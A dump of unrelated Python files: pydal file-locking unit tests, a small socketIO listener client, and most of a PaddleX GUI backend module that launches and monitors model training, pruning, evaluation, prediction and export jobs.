if __name__ == '__main__':
Agent()
|
contribs.py
|
import os
import threading
import time
from ._compat import unittest
from ._adapt import IS_GAE
from pydal._compat import to_bytes
from pydal.contrib.portalocker import lock, unlock, read_locked, write_locked
from pydal.contrib.portalocker import LockedFile, LOCK_EX
def tearDownModule():
if os.path.isfile('test.txt'):
os.unlink('test.txt')
class testPortalocker(unittest.TestCase):
def test_LockedFile(self):
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
f.close()
f = LockedFile('test.txt', mode='rb')
self.assertEqual(f.read(), to_bytes('test ok'))
f.close()
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_openmultiple(self):
t0 = time.time()
def worker1():
start = time.time()
f1 = LockedFile('test.txt', mode='ab')
time.sleep(2)
f1.write(to_bytes("%s\t%s\n" % (start, time.time())))
f1.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes(''))
f.close()
th = []
for x in range(10):
t1 = threading.Thread(target=worker1)
th.append(t1)
t1.start()
for t in th:
t.join()
with open('test.txt') as g:
content = g.read()
results = [line.strip().split('\t') for line in content.split('\n') if line]
# all started at more or less the same time
starts = [1 for line in results if float(line[0])-t0<1]
ends = [line[1] for line in results]
self.assertEqual(sum(starts), len(starts))
# end - start is at least 2
for line in results:
self.assertTrue(float(line[1]) - float(line[0]) >= 2)
# ends are not the same
self.assertTrue(len(ends) == len(ends))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_lock_unlock(self):
def worker1(fh):
time.sleep(2)
unlock(fh)
def worker2(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker1, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
f.close()
# it took at least 2 seconds to read
# although nothing is there until .close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes(''))
content = read_locked('test.txt')
self.assertEqual(content, to_bytes('test ok'))
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker2, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
# content is there because we called close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_read_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_write_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
write_locked('test.txt', to_bytes('test ok'))
end = int(time.time())
t1.join()
with open('test.txt') as g:
content = g.read()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, 'test ok')
def test_exception(self):
self.assertRaises(RuntimeError, LockedFile, *['test.txt', 'x'])
def test_readline(self):
f = LockedFile('test.txt', 'wb')
f.write(to_bytes('abc\n'))
f.write(to_bytes('123\n'))
f.close()
f = LockedFile('test.txt', 'rb')
rl = f.readline()
self.assertTrue(to_bytes('abc') in rl)
rl = f.readline()
self.assertTrue(to_bytes('123') in rl)
f.close()
f = LockedFile('test.txt', 'rb')
rls = f.readlines()
f.close()
self.assertEqual(len(rls), 2)
|
multithreading-client.py
|
from socketIO_client_nexus import SocketIO, BaseNamespace
import json
from threading import Thread
import threading
socketIO = SocketIO('ip', port)
namespace = socketIO.define(BaseNamespace, '/directory')
def receive_events_thread():
socketIO.wait()
def on_response(*args):
global emotion_batch
loads = json.loads(args[0])
try:
for i in loads['database']:
emotion_batch.append(dict_emotion[i['emotion']])
except Exception as e:
pass
socketIO = SocketIO('ip', port)
namespace = socketIO.define(BaseNamespace, '/directory')
namespace.on('update', on_response)
receive_events_thread = Thread(target=receive_events_thread)
receive_events_thread.daemon = True
receive_events_thread.start()
while True:
# do something while listen to socket
|
operate.py
|
# copytrue (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import os
import numpy as np
from PIL import Image
import sys
import cv2
import psutil
import shutil
import pickle
import base64
import multiprocessing as mp
from ..utils import (pkill, set_folder_status, get_folder_status, TaskStatus,
PredictStatus, PruneStatus)
from .evaluate.draw_pred_result import visualize_classified_result, visualize_detected_result, visualize_segmented_result
from .visualize import plot_det_label, plot_insseg_label, get_color_map_list
def _call_paddle_prune(best_model_path, prune_analysis_path, params):
mode = 'w'
sys.stdout = open(
osp.join(prune_analysis_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(
osp.join(prune_analysis_path, 'err.log'), mode, encoding='utf-8')
sensitivities_path = osp.join(prune_analysis_path, "sensitivities.data")
task_type = params['task_type']
dataset_path = params['dataset_path']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
if task_type == "classification":
from .prune.classification import prune
elif task_type in ["detection", "instance_segmentation"]:
from .prune.detection import prune
elif task_type == "segmentation":
from .prune.segmentation import prune
batch_size = params['train'].batch_size
prune(best_model_path, dataset_path, sensitivities_path, batch_size)
import paddlex as pdx
from paddlex.cv.models.slim.visualize import visualize
model = pdx.load_model(best_model_path)
visualize(model, sensitivities_path, prune_analysis_path)
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEDONE)
def _call_paddlex_train(task_path, params):
'''
Args:
params为dict,字段包括'pretrain_weights_download_save_dir': 预训练模型保存路径,
'task_type': 任务类型,'dataset_path': 数据集路径,'train':训练参数
'''
mode = 'w'
if params['train'].resume_checkpoint is not None:
mode = 'a'
sys.stdout = open(osp.join(task_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(osp.join(task_path, 'err.log'), mode, encoding='utf-8')
sys.stdout.write("This log file path is {}\n".format(
osp.join(task_path, 'out.log')))
sys.stdout.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
sys.stderr.write("This log file path is {}\n".format(
osp.join(task_path, 'err.log')))
sys.stderr.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
pdx.gui_mode = True
pdx.log_level = 3
pdx.pretrain_dir = params['pretrain_weights_download_save_dir']
task_type = params['task_type']
dataset_path = params['dataset_path']
if task_type == "classification":
from .train.classification import train
elif task_type in ["detection", "instance_segmentation"]:
from .train.detection import train
elif task_type == "segmentation":
from .train.segmentation import train
train(task_path, dataset_path, params['train'])
set_folder_status(task_path, TaskStatus.XTRAINDONE)
def _call_paddlex_evaluate_model(task_path,
model_path,
task_type,
epoch,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
evaluate_status_path = osp.join(task_path, './logs/evaluate')
sys.stdout = open(
osp.join(evaluate_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(evaluate_status_path, 'err.log'), 'w', encoding='utf-8')
if task_type == "classification":
from .evaluate.classification import Evaluator
evaluator = Evaluator(model_path, topk=topk)
elif task_type == "detection":
from .evaluate.detection import DetEvaluator
evaluator = DetEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "instance_segmentation":
from .evaluate.detection import InsSegEvaluator
evaluator = InsSegEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "segmentation":
from .evaluate.segmentation import Evaluator
evaluator = Evaluator(model_path)
report = evaluator.generate_report()
report['epoch'] = epoch
pickle.dump(report, open(osp.join(task_path, "eval_res.pkl"), "wb"))
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATED)
set_folder_status(task_path, TaskStatus.XEVALUATED)
def _call_paddlex_predict(task_path,
predict_status_path,
params,
img_list,
img_data,
save_dir,
score_thresh,
epoch=None):
total_num = open(
osp.join(predict_status_path, 'total_num'), 'w', encoding='utf-8')
def write_file_num(total_file_num):
total_num.write(str(total_file_num))
total_num.close()
sys.stdout = open(
osp.join(predict_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(predict_status_path, 'err.log'), 'w', encoding='utf-8')
import paddlex as pdx
pdx.log_level = 3
task_type = params['task_type']
dataset_path = params['dataset_path']
if epoch is None:
model_path = osp.join(task_path, 'output', 'best_model')
else:
model_path = osp.join(task_path, 'output', 'epoch_{}'.format(epoch))
model = pdx.load_model(model_path)
file_list = dict()
predicted_num = 0
if task_type == "classification":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = items[1]
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, label_id in file_list.items():
pred_result = {}
if label_id is not None:
pred_result["gt_label"] = model.labels[int(label_id)]
results = model.predict(img_file=image)
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, image, pred_result)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
pred_result = {}
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, img, pred_result)
elif task_type in ["detection", "instance_segmentation"]:
if img_data is None:
if task_type == "detection" and osp.exists(
osp.join(dataset_path, "test_list.txt")):
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
image_gt = None
if anno is not None:
image_gt = plot_det_label(image, anno, model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
elif len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test.json")):
from pycocotools.coco import COCO
anno_path = osp.join(dataset_path, "test.json")
coco = COCO(anno_path)
img_ids = coco.getImgIds()
total_file_num = len(img_ids)
write_file_num(total_file_num)
for img_id in img_ids:
img_anno = coco.loadImgs(img_id)[0]
file_name = img_anno['file_name']
name = (osp.split(file_name)[-1]).split(".")[0]
anno = osp.join(dataset_path, "Annotations", name + ".npy")
img_file = osp.join(dataset_path, "JPEGImages", file_name)
results = model.predict(img_file=img_file)
image_pred = pdx.det.visualize(
img_file,
results,
threshold=score_thresh,
save_dir=None)
save_name = osp.join(save_dir, osp.split(img_file)[-1])
if task_type == "detection":
image_gt = plot_det_label(img_file, anno, model.labels)
else:
image_gt = plot_insseg_label(img_file, anno,
model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
else:
total_file_num = len(img_list)
write_file_num(total_file_num)
for image in img_list:
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_detected_result(save_name, None, image_pred)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
image_pred = pdx.det.visualize(
img, results, threshold=score_thresh, save_dir=None)
image_gt = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_detected_result(save_name, image_gt, image_pred)
elif task_type == "segmentation":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.seg.visualize(image, results, save_dir=None)
pse_pred = pdx.seg.visualize(
image, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
if anno is not None:
label = np.asarray(Image.open(anno)).astype('uint8')
image_ground = pdx.seg.visualize(
image, {'label_map': label}, save_dir=None)
pse_label = pdx.seg.visualize(
image, {'label_map': label}, weight=0, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
results = model.predict(img)
image_pred = pdx.seg.visualize(image, results, save_dir=None)
pse_pred = pdx.seg.visualize(
image, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
set_folder_status(predict_status_path, PredictStatus.XPREDONE)
def _call_paddlex_export_infer(task_path, save_dir, export_status_path, epoch):
# 导出模型不使用GPU
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
model.export_inference_model(save_dir)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlex_export_quant(task_path, params, save_dir, export_status_path,
epoch):
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
dataset_path = params['dataset_path']
task_type = params['task_type']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
if task_type == "classification":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "detection":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "instance_segmentation":
train_json = osp.join(dataset_path, 'train.json')
val_json = osp.join(dataset_path, 'val.json')
quant_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=train_json,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=val_json,
transforms=model.eval_transforms)
elif task_type == "segmentation":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
metric_before = model.evaluate(eval_dataset)
pdx.log_level = 3
pdx.slim.export_quant_model(
model, quant_dataset, batch_size=1, save_dir=save_dir, cache_dir=None)
model_quant = pdx.load_model(save_dir)
metric_after = model_quant.evaluate(eval_dataset)
metrics = {}
if task_type == "segmentation":
metrics['before'] = {'miou': metric_before['miou']}
metrics['after'] = {'miou': metric_after['miou']}
else:
metrics['before'] = metric_before
metrics['after'] = metric_after
import json
with open(
osp.join(export_status_path, 'quant_result.json'),
'w',
encoding='utf-8') as f:
json.dump(metrics, f)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlelite_export_lite(model_path, save_dir=None, place="arm"):
import paddlelite.lite as lite
opt = lite.Opt()
model_file = os.path.join(model_path, '__model__')
params_file = os.path.join(model_path, '__params__')
if save_dir is None:
save_dir = osp.join(model_path, "lite_model")
if not osp.exists(save_dir):
os.makedirs(save_dir)
path = osp.join(save_dir, "model")
opt.run_optimize("", model_file, params_file, "naive_buffer", place, path)
def safe_clean_folder(folder):
if osp.exists(folder):
try:
shutil.rmtree(folder)
os.makedirs(folder)
except Exception as e:
pass
if osp.exists(folder):
for root, dirs, files in os.walk(folder):
for name in files:
try:
os.remove(os.path.join(root, name))
except Exception as e:
pass
else:
os.makedirs(folder)
else:
os.makedirs(folder)
if not osp.exists(folder):
os.makedirs(folder)
def get_task_max_saved_epochs(task_path):
saved_epoch_num = -1
output_path = osp.join(task_path, "output")
if osp.exists(output_path):
for f in os.listdir(output_path):
if f.startswith("epoch_"):
if not osp.exists(osp.join(output_path, f, '.success')):
continue
curr_epoch_num = int(f[6:])
if curr_epoch_num > saved_epoch_num:
saved_epoch_num = curr_epoch_num
return saved_epoch_num
def get_task_status(task_path):
status, message = get_folder_status(task_path, True)
task_id = os.path.split(task_path)[-1]
err_log = os.path.join(task_path, 'err.log')
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XTRAINFAIL
message = "训练任务{}异常终止,请查阅错误日志具体确认原因{}。\n\n 如若通过日志无法确定原因,可尝试以下几种方法,\n" \
"1. 尝试重新启动训练,看是否能正常训练; \n" \
"2. 调低batch_size(需同时按比例调低学习率等参数)排除是否是显存或内存不足的原因导致;\n" \
"3. 前往GitHub提ISSUE,描述清楚问题会有工程师及时回复: https://github.com/PaddlePaddle/PaddleX/issues ; \n" \
"3. 加QQ群1045148026或邮件至paddlex@baidu.com在线咨询工程师".format(task_id, err_log)
set_folder_status(task_path, status, message)
return status, message
def train_model(task_path):
"""训练模型
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
sensitivities_path = params['train'].sensitivities_path
p = mp.Process(target=_call_paddlex_train, args=(task_path, params))
p.start()
if sensitivities_path is None:
set_folder_status(task_path, TaskStatus.XTRAINING, p.pid)
else:
set_folder_status(task_path, TaskStatus.XPRUNETRAIN, p.pid)
return p
def stop_train_model(task_path):
"""停止正在训练的模型
Args:
task_path(str): 从task_path下的'XTRANING'文件中获取训练的进程id
"""
status, message = get_task_status(task_path)
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
pkill(pid)
best_model_saved = True
if not osp.exists(osp.join(task_path, 'output', 'best_model')):
best_model_saved = False
set_folder_status(task_path, TaskStatus.XTRAINEXIT, best_model_saved)
else:
raise Exception("模型训练任务没在运行中")
def prune_analysis_model(task_path):
"""模型裁剪分析
Args:
task_path(str): 模型训练的参数保存在task_path
dataset_path(str) 模型裁剪中评估数据集的路径
"""
best_model_path = osp.join(task_path, 'output', 'best_model')
assert osp.exists(best_model_path), "该任务暂未保存模型,无法进行模型裁剪分析"
prune_analysis_path = osp.join(task_path, 'prune')
if not osp.exists(prune_analysis_path):
os.makedirs(prune_analysis_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
assert params['train'].model.lower() not in [
"ppyolo", "fasterrcnn", "maskrcnn", "fastscnn", "HRNet_W18"
], "暂不支持PPYOLO、FasterRCNN、MaskRCNN、HRNet_W18、FastSCNN模型裁剪"
p = mp.Process(
target=_call_paddle_prune,
args=(best_model_path, prune_analysis_path, params))
p.start()
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEING, p.pid)
set_folder_status(task_path, TaskStatus.XPRUNEING, p.pid)
return p
def get_prune_status(prune_path):
status, message = get_folder_status(prune_path, True)
if status in [PruneStatus.XSPRUNEING]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PruneStatus.XSPRUNEFAIL
message = "模型裁剪异常终止,可能原因如下:\n1.暂不支持FasterRCNN、MaskRCNN模型的模型裁剪\n2.模型裁剪过程中进程被异常结束,建议重新启动模型裁剪任务"
set_folder_status(prune_path, status, message)
return status, message
def stop_prune_analysis(prune_path):
"""停止正在裁剪分析的模型
Args:
prune_path(str): prune_path'XSSLMING'文件中获取训练的进程id
"""
status, message = get_prune_status(prune_path)
if status == PruneStatus.XSPRUNEING:
pid = int(message)
pkill(pid)
set_folder_status(prune_path, PruneStatus.XSPRUNEEXIT)
else:
raise Exception("模型裁剪分析任务未在运行中")
def evaluate_model(task_path,
task_type,
epoch=None,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
"""评估最优模型
Args:
task_path(str): 模型训练相关结果的保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,无法进行评估".format(output_path))
evaluate_status_path = osp.join(task_path, './logs/evaluate')
safe_clean_folder(evaluate_status_path)
if epoch is None:
model_path = osp.join(output_path, 'best_model')
else:
epoch_dir = "{}_{}".format('epoch', epoch)
model_path = osp.join(output_path, epoch_dir)
p = mp.Process(
target=_call_paddlex_evaluate_model,
args=(task_path, model_path, task_type, epoch, topk, score_thresh,
overlap_thresh))
p.start()
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATING, p.pid)
return p
def get_evaluate_status(task_path):
"""获取导出状态
Args:
task_path(str): 训练任务文件夹
"""
evaluate_status_path = osp.join(task_path, './logs/evaluate')
if not osp.exists(evaluate_status_path):
return None, "No evaluate fold in path {}".format(task_path)
status, message = get_folder_status(evaluate_status_path, True)
if status == TaskStatus.XEVALUATING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEVALUATEFAIL
message = "评估过程出现异常,请尝试重新评估!"
set_folder_status(evaluate_status_path, status, message)
if status not in [
TaskStatus.XEVALUATING, TaskStatus.XEVALUATED,
TaskStatus.XEVALUATEFAIL
]:
raise ValueError("Wrong status in evaluate task {}".format(status))
return status, message
def get_predict_status(task_path):
"""获取预测任务状态
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "./logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
if predict_num == 1:
total_num = 1
else:
total_num = int(
open(
osp.join(predict_status_path, "total_num"),
encoding='utf-8').readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def predict_test_pics(task_path,
img_list=[],
img_data=None,
save_dir=None,
score_thresh=0.5,
epoch=None):
"""模型预测
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
predict_status_path = osp.join(task_path, "./logs/predict")
safe_clean_folder(predict_status_path)
save_dir = osp.join(task_path, 'visualized_test_results')
safe_clean_folder(save_dir)
p = mp.Process(
target=_call_paddlex_predict,
args=(task_path, predict_status_path, params, img_list, img_data,
save_dir, score_thresh, epoch))
p.start()
set_folder_status(predict_status_path, PredictStatus.XPRESTART, p.pid)
return p, save_dir
def stop_predict_task(task_path):
"""停止预测任务
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "./logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
else:
pkill(pid)
status = PredictStatus.XPREFAIL
message = "图片预测进程已停止!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
total_num = int(
open(
osp.join(predict_status_path, "total_num"), encoding='utf-8')
.readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def get_export_status(task_path):
"""获取导出状态
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
导出的状态和其他消息.
"""
export_status_path = osp.join(task_path, './logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
# raise ValueError("获取到的导出状态异常,{}。".format(status))
return None, "获取到的导出状态异常,{}。".format(status)
return status, message
def export_quant_model(task_path, save_dir, epoch=None):
"""导出量化模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, './logs/export')
safe_clean_folder(export_status_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
p = mp.Process(
target=_call_paddlex_export_quant,
args=(task_path, params, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def export_noquant_model(task_path, save_dir, epoch=None):
"""导出inference模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, './logs/export')
